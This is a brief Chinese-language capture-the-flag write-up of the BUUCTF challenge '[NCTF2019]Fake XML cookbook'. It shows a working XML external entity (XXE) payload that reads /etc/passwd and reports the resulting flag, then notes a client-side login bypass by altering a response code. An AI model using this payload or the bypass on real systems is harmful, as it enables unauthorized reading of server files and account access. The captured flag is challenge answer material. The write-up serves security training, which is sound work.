[NCTF2019]Fake XML cookbook
BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[NCTF2019]Fake%20XML%20cookbook启动靶机,一个登录页面
试了一下弱口令和万能密码,不行.
查看一下源码,发现可能存在xxe(xml外部实体注入)
抓包,尝试一下常见payload,传递一个外部实体DTD看看会不会被执行
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>root</password>
</user>
说明漏洞确实存在,修改一下payload,可以读取到flag{402098c9-0fd9-4c60-8ecd-5683c3931ccd}
=====================
题外话,在看代码的时候,发现code==0 表示登陆失败,code==1 表示登录成功。
某些时候,修改code的值,会自动跳转进入内部页面,从而达到登录绕过。
这种是通过前端来校验用户登录的,很弱,一般还是比较少见的